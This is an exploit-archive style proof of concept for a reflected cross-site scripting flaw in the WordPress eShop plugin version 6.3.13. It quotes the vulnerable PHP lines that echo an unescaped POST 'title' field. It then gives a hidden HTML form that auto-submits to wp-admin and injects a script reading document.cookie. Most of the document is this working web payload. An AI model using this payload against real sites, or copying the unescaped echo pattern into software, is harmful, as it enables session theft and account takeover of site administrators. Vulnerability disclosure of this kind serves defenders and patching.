<!-- # Exploit Title : WordPress eShop Plugin Reflected XSS # Exploit Author : Ashiyane Digital Security Team # Vendor Homepage : https://wordpress.org/plugins/eshop/ # Software Link : https://downloads.wordpress.org/plugin/eshop.6.3.13.zip # Date: 2015-09-04 # Version : 6.3.13 # Tested On : Elementary Os - Firefox # Vulnerable Code: # File: eshop-downloads.php , Line: 138 And 468 # Line 138: # $atitle=$_POST['title']; # Line 468: <input type="text" name="title" id="filetitle" size="35" value="<?php echo $atitle; ?>" /> # Exploit : --> <form action="http://127.0.0.1/wordpress/wp-admin/admin.php?page=eshop-downloads.php" Method="post" nAme="form1" enctype="multipart/form-data"> <input name="upfile" type="HidDen" value="M" /> <input type="hIdden" name="max_file_size" value="67108864" /> <input type="HIDDEN" Name="title" value='"><script>alert(document.cookie)</script><"'/> <input name="overwrite" value="yes" type="hidden" /> <input type="hidden" name="up" value="upload File" class="button-primary" /> </form> <script language="javascript"> setTimeout('form1.submit()', 1); </script> <!-- # Discovered By : Ehsan Hosseini -->